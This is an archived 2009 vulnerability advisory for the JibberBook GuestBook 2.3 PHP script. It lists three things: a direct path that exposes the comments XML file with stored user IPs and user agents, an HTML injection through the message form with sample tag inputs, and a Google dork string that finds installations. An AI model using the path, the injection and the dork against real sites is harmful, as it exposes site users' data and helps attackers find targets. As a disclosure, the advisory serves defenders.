Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22316
HistoryAug 12, 2009 - 12:00 a.m.

JibberBook GuestBook 2.3 Multiple Vulnerabilities

2009-08-1200:00:00
vulners.com
25

###########################################################################
###########################################################################

    [»] Script:             [ JibberBook  ]
    [»] Language:           [ PHP ]
    [»] Website:            [ http://jibberbook.com ]
    [»] Founder:            [ Onur YILMAZ aka DJR ]
    [»] Site:               [ www.onuryilmaz.info ]

###########################################################################
###########################################################################

=== [ data source of comments disclosure (.xml file) ] ===

    [»] [JibberBook]/data_layer/xml/comments.xml

    === [ output ] ===

            <message mID="m54a7c965f0318a7.23679427">
             <name></name> 
             <website /> 
             <comment></comment> 
             <date></date> 
             <user_ip>127.0.0.1</user_ip> 
             <user_agent>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML,

like Gecko) Chrome/2.0.172.39 Safari/530.5</user_agent>
<spam>0</spam>
</message>

###########################################################################
###########################################################################

=== [ HTML Code Injection ] ===

    [»] add new message
    
            &lt;img src=&quot;&quot;&gt;

            &lt;a href=&quot;&quot;&gt;&lt;/a&gt;

###########################################################################
###########################################################################

=== [ Google Dork ] ===

    [»] &quot;JibberBook created by&quot;

###########################################################################
###########################################################################